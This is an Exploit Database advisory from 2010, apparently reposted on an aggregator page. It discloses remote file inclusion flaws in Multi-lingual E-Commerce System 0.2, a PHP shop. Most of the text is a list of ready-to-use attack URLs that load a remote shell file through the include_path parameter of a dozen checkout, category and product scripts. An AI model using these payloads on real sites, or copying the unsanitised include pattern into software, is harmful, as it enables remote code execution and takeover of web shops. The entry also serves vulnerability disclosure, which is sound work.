Multi-lingual E-Commerce System 0.2 – Multiple Remote File Inclusions

• Exploit Database
• 11 阅读

• 作者： JosS
  日期： 2010-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14835/

• Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities
  bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
  
  contact: sys-project[at]hotmail.com
  website: http://www.hack0wn.com/
  
  - download: http://sourceforge.net/projects/mlecsphp/
  
  - CMS:
  
   A multi-lingual multi-currency PHP e-commerce system.
  
  ~ [RFI]
  
  http://target/path/inc/checkout2-CYM.php?include_path=[shell.txt?]
  http://target/path/inc/checkout2-EN.php?include_path=[shell.txt?]
  http://target/path/inc/checkout2-FR.php?include_path=[shell.txt?]
  http://target/path/inc/cat-FR.php?include_path=[shell.txt?]
  http://target/path/inc/cat-EN.php?include_path=[shell.txt?]
  http://target/path/inc/cat-CYM.php?include_path=[shell.txt?]
  http://target/path/inc/checkout1-CYM.php?include_path=[shell.txt?]
  http://target/path/inc/checkout1-EN.php?include_path=[shell.txt?]
  http://target/path/inc/checkout1-FR.php?include_path=[shell.txt?]
  http://target/path/inc/prod-CYM.php?include_path=[shell.txt?]
  http://target/path/inc/prod-EN.php?include_path=[shell.txt?]
  http://target/path/inc/prod-FR.php?include_path=[shell.txt?]
  [and more] [...]
  
  
  __h0__